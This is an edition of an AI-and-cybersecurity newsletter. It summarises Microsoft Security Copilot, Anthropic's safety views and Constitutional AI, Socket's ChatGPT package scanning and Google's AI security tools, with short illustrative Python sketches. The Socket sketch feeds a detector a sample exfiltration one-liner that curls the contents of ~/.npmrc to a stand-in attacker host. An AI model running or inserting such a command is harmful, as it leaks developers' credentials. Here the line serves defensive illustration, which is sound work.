TP#11 Apply AI to Solve Security Challenges at Scale
Plus: Navigating the Complexities of AI Safety
Welcome to the 11th edition of Threat Prompt, where AI and Cybersecurity intersect…
Five Ideas
1. Introducing Microsoft Security Copilot
Security Copilot features an immutable audit trail and lets subscribers ask everyday security questions of a security-specific LLM:
When Security Copilot receives a prompt from a security professional, it uses the full power of the security-specific model to deploy skills and queries that maximize the value of the latest large language model capabilities. And this is unique to a security use-case. Our cyber-trained model adds a learning system to create and tune new skills. Security Copilot then can help catch what other approaches might miss and augment an analyst’s work. In a typical incident, this boost translates into gains in the quality of detection, speed of response and ability to strengthen security posture.
Security Copilot doesn’t always get everything right. AI-generated content can contain mistakes. But Security Copilot is a closed-loop learning system, which means it’s continually learning from users and giving them the opportunity to give explicit feedback with the feedback feature that is built directly into the tool. As we continue to learn from these interactions, we are adjusting its responses to create more coherent, relevant and useful answers.
Watch the 3-minute demo to learn more and see sample use cases. Microsoft continues to be fast out of the gate with enterprise-oriented AI solutions.
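Microsoft hasn’t said how the audit trail is implemented. Purely to illustrate the concept of an immutable record of analyst prompts and model responses, here is a minimal Python sketch of an append-only, hash-chained log; every name in it is illustrative and none of it is Microsoft’s API:

```python
# Illustrative only: a tamper-evident log of prompts and responses.
# Each entry embeds the hash of the previous one, so rewriting history
# breaks the chain and verify() fails.
import hashlib
import json
import time

class AuditTrail:
    def __init__(self) -> None:
        self.entries = []
        self._last_hash = "0" * 64  # genesis value

    def record(self, prompt: str, response: str) -> dict:
        entry = {
            "timestamp": time.time(),
            "prompt": prompt,
            "response": response,
            "prev_hash": self._last_hash,
        }
        entry["hash"] = hashlib.sha256(
            json.dumps(entry, sort_keys=True).encode()
        ).hexdigest()
        self._last_hash = entry["hash"]
        self.entries.append(entry)
        return entry

    def verify(self) -> bool:
        prev = "0" * 64
        for entry in self.entries:
            body = {k: v for k, v in entry.items() if k != "hash"}
            expected = hashlib.sha256(
                json.dumps(body, sort_keys=True).encode()
            ).hexdigest()
            if entry["prev_hash"] != prev or entry["hash"] != expected:
                return False
            prev = entry["hash"]
        return True

trail = AuditTrail()
trail.record("Which hosts contacted this IOC in the last 24 hours?", "<model answer>")
assert trail.verify()
```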
2. Navigating the Complexities of AI Safety
Anthropic - an AI safety and research company - is on a mission to build reliable, interpretable, and steerable AI systems. Two of the challenges they highlight:
First, it may be tricky to build safe, reliable, and steerable systems when those systems are starting to become as intelligent and as aware of their surroundings as their designers. To use an analogy, it is easy for a chess grandmaster to detect bad moves in a novice but very hard for a novice to detect bad moves in a grandmaster. If we build an AI system that’s significantly more competent than human experts but it pursues goals that conflict with our best interests, the consequences could be dire. This is the technical alignment problem.
Second, rapid AI progress would be very disruptive, changing employment, macroeconomics, and power structures both within and between nations. These disruptions could be catastrophic in their own right, and they could also make it more difficult to build AI systems in careful, thoughtful ways, leading to further chaos and even more problems with AI.
If you read one thing on AI safety, I recommend this post covering their core views - it’s balanced and informative.
3. Scaling Supervision with Constitutional AI
Reinforcement learning from human feedback (RLHF) is the dominant method by which a computer program learns to make better decisions by receiving feedback from humans, much like a teacher giving a student feedback to improve their performance. The program uses this feedback to adjust its actions and improve its decision-making abilities over time.
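To make that concrete, here is a toy sketch of the reward-modelling step at the heart of RLHF: humans pick the better of two responses, and a small model is trained to score the preferred response higher. The bag-of-words featuriser and example preference pairs are stand-ins of my own; a real system would use a language model’s representations and large volumes of human labels:

```python
# Toy RLHF reward model: learn to score human-preferred responses higher.
import torch
import torch.nn as nn

VOCAB = ["block", "the", "suspicious", "ip", "ignore", "alert", "investigate", "log"]

def featurise(text: str) -> torch.Tensor:
    """Bag-of-words stand-in for a real language-model encoder."""
    words = text.lower().split()
    return torch.tensor([float(words.count(w)) for w in VOCAB])

reward_model = nn.Linear(len(VOCAB), 1)  # maps a response to a scalar reward
optimiser = torch.optim.Adam(reward_model.parameters(), lr=0.1)

# Each pair: (response the human preferred, response the human rejected).
preferences = [
    ("investigate the alert and log it", "ignore the alert"),
    ("block the suspicious ip", "ignore the suspicious ip"),
]

for _ in range(100):
    for chosen, rejected in preferences:
        r_chosen = reward_model(featurise(chosen))
        r_rejected = reward_model(featurise(rejected))
        # Push the chosen response's reward above the rejected one's.
        loss = -torch.nn.functional.logsigmoid(r_chosen - r_rejected).mean()
        optimiser.zero_grad()
        loss.backward()
        optimiser.step()

print(reward_model(featurise("investigate the alert")).item())  # higher score
print(reward_model(featurise("ignore the alert")).item())       # lower score
```

In full RLHF, a reward model like this then steers a second training phase in which the language model is optimised (typically with PPO) to produce responses the reward model scores highly.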
If AI capabilities are set to exceed human-level performance - first in specific domains, and then more generally (AGI) - we need ways to supervise an AI that don’t rely solely on human feedback since we could get duped!
This is the topic of Anthropic’s research paper on scaling supervision:
As AI systems become more capable, we would like to enlist their help to supervise other AIs. We experiment with methods for training a harmless AI assistant through self-improvement, without any human labels identifying harmful outputs. The only human oversight is provided through a list of rules or principles, and so we refer to the method as ‘Constitutional AI’. … The idea is that human supervision will come entirely from a set of principles that should govern AI behavior, along with a small number of examples used for few-shot prompting. Together these principles form the constitution. … We show performance on 438 binary comparison questions intended to evaluate helpfulness, honesty, and harmlessness. We compare the performance of a preference model, trained on human feedback data, to pretrained language models, which evaluate the comparisons as multiple choice questions. We see that chain of thought reasoning significantly improves the performance at this task. The trends suggest that models larger than 52B will be competitive with human feedback-trained preference models.
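In the paper’s supervised phase, the model drafts a response, critiques the draft against the principles, and revises it; the revisions then become training data. A rough sketch of that loop is below, assuming you supply your own LLM completion function; the principles shown are illustrative and are not Anthropic’s actual constitution:

```python
# Sketch of a Constitutional AI critique-and-revise loop.
# `complete` is any prompt-in, text-out function you provide (an LLM API wrapper).
from typing import Callable, List

PRINCIPLES: List[str] = [
    "Choose the response that is least likely to help someone cause harm.",
    "Choose the response that is honest and explains any refusal.",
]

def constitutional_revision(prompt: str, complete: Callable[[str], str]) -> str:
    """Draft an answer, then critique and revise it against each principle."""
    draft = complete(f"Human: {prompt}\n\nAssistant:")
    for principle in PRINCIPLES:
        critique = complete(
            "Critique the following response according to this principle.\n"
            f"Principle: {principle}\nResponse: {draft}\nCritique:"
        )
        draft = complete(
            "Rewrite the response to address the critique while staying helpful.\n"
            f"Response: {draft}\nCritique: {critique}\nRevision:"
        )
    return draft  # the revised output later serves as self-supervised training data
```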
A related challenge with supervisory AI is the tendency of RLHF-trained models to exhibit evasive behaviour. For instance, when instructed to perform a task it deems harmful, the model may refuse to comply without explanation. Sometimes it may even adopt an accusatory tone, further complicating communication.
The method therefore improves upon, and partially replaces, reinforcement learning from human feedback. The new assistant ‘RL-CAI’ is preferred by crowdworkers over those trained with previously collected human feedback labels for harmfulness.
We find that RL-CAI is virtually never evasive, and often gives nuanced and harmless responses to most red team prompts.
As AI adoption and capability grow, developing and refining supervisory AI is crucial to ensure that it is transparent, accountable, and trustworthy.
4. Use ChatGPT to examine every npm and PyPI package for security issues
In just two days, Socket identified and confirmed 227 packages in popular software package repositories that were either vulnerable or malicious:
Socket is now utilizing AI-driven source code analysis with ChatGPT to examine every npm and PyPI package. When a potential issue is detected in a package, we flag it for review and request ChatGPT to summarize its findings. As with all AI-based tools, there may be false positives, and we will not enable this as a default, blocking issue until more feedback is gathered.
One of the core tenets of Socket is to allow developers to make their own judgments about risk so that we do not impede their work. Forcing a developer to analyze every install script, which could cross into different programming languages and even environments, is a lot to ask of a developer–especially if it turns out to be a false positive. AI analysis can assist with this manual audit process. When Socket identifies an issue, such as an install script, we also show the open-source code to ChatGPT to assess the risk. This can significantly speed up determining if something truly is an issue by having an extra reviewer, in this case, ChatGPT, already having done some preliminary work.
What classes of vulnerability did they find? Information exfiltration, injection vulnerabilities, exposed credentials, potential vulnerabilities, backdoors and prompt poisoning…
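Socket hasn’t published its pipeline, but the core step it describes, showing a flagged install script to an LLM and asking for a risk summary, fits in a few lines. The sketch below uses the OpenAI Python client; the model choice, prompt wording and example script are my assumptions, not Socket’s code:

```python
# Ask an LLM to summarise the risk of a package install script (illustrative).
# Requires OPENAI_API_KEY in the environment.
from openai import OpenAI

client = OpenAI()

def assess_install_script(package_name: str, script_source: str) -> str:
    """Return the model's summary of risky behaviour in an install script."""
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",
        messages=[
            {"role": "system", "content": "You are a security reviewer of open-source packages."},
            {
                "role": "user",
                "content": (
                    f"Review this install script from the package '{package_name}'. "
                    "Summarise any signs of data exfiltration, injection, exposed "
                    "credentials, backdoors or other malicious behaviour.\n\n"
                    f"{script_source}"
                ),
            },
        ],
    )
    return response.choices[0].message.content

# Example: a postinstall one-liner that ships local credentials to a remote host.
print(assess_install_script("example-package", "curl https://evil.example/?d=$(cat ~/.npmrc)"))
```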
5. How Google uses AI to improve digital security
As part of a broader blog post on Google’s approach to AI security, Phil Venables, CISO for Google Cloud, and Royal Hansen, VP Engineering for Privacy, Safety, and Security, shared seven examples of existing Google products that use AI at scale to improve security outcomes:
Gmail’s AI-powered spam-filtering capabilities block nearly 10 million spam emails every minute. This keeps 99.9% of phishing attempts and malware from reaching your inbox.
Google’s Safe Browsing, an industry-leading service, uses AI classifiers running directly in the Chrome web browser to warn users about unsafe websites.
IAM recommender uses AI technologies to analyze usage patterns to recommend more secure IAM policies that are custom tailored to an organization’s environment. Once implemented, they can make cloud deployments more secure and cost-effective, with maximum performance.
Chronicle Security Operations and Mandiant Automated Defense use integrated reasoning and machine learning to identify critical alerts, suppress false positives, and generate a security event score to help reduce alert fatigue.
Breach Analytics for Chronicle uses machine learning to calculate a Mandiant IC-Score, a data science-based “maliciousness” scoring algorithm that filters out benign indicators and helps teams focus on relevant, high-priority IOCs. These IOCs are then matched to security data stored in Chronicle to find incidents in need of further investigation.
reCAPTCHA Enterprise and Web Risk use unsupervised learning models to detect clusters of hijacked and fake accounts to help speed up investigation time for analysts and act to protect accounts, and minimize risk.
Cloud Armor Adaptive Protection uses machine learning to automatically detect threats at Layer 7, which contributed to detecting and blocking one of the largest DDoS attacks ever reported.
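Taking the Breach Analytics item above as an example, the scoring-and-filtering idea boils down to something simple in code. This sketch is purely illustrative and is not Google’s or Mandiant’s implementation; the threshold, score scale and data shapes are assumptions:

```python
# Illustrative IOC triage: drop low-scoring indicators, match the rest to events.
from typing import Dict, List

def triage_iocs(iocs: Dict[str, int], events: List[dict], threshold: int = 80) -> List[dict]:
    """Return stored events that match indicators scoring at or above the threshold."""
    high_confidence = {ioc for ioc, score in iocs.items() if score >= threshold}
    return [event for event in events if event.get("indicator") in high_confidence]

iocs = {"198.51.100.7": 95, "example.com": 12}  # indicator -> maliciousness score (0-100)
events = [
    {"indicator": "198.51.100.7", "host": "srv-42"},
    {"indicator": "example.com", "host": "laptop-9"},
]
print(triage_iocs(iocs, events))  # only the high-scoring indicator surfaces
```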
Bonus Idea
Offline voice chat with the Llama?
Georgi Gerganov announced talk-llama:
LLaMA voice chat + Siri TTS. This example is now truly 100% offline since we are now using the built-in Siri text-to-speech available on MacOS through the “say” command. It should run on MacOS, Linux and Windows, although for best performance I recommend Apple Silicon.
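The text-to-speech half of that setup is tiny. As an illustration, here is how a script could speak a model reply through the macOS “say” command; the reply text below is a stand-in for actual LLaMA output:

```python
# Speak text offline via the macOS built-in "say" command.
import subprocess

def speak(text: str) -> None:
    """Speak model output with the system text-to-speech engine."""
    subprocess.run(["say", text], check=True)

# In talk-llama, this would be the model's reply to your transcribed speech.
speak("Hello, this is your local assistant speaking.")
```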
Feedback
Click the emoji that best captures your reaction to this edition…
Sponsors
Save time finding your next Cyber Product job with my hand-curated summary.
Dedicated to cyber product Engineers, Testers and Leaders: Cyber Product Jobs
Thanks for reading!
What would make this newsletter more useful to you? If you have feedback, a comment or question, or just feel like saying hello, you can reply to this email; it will get to me, and I will read it.
-Craig
New To This Newsletter?
Subscribe here to get what I share next week.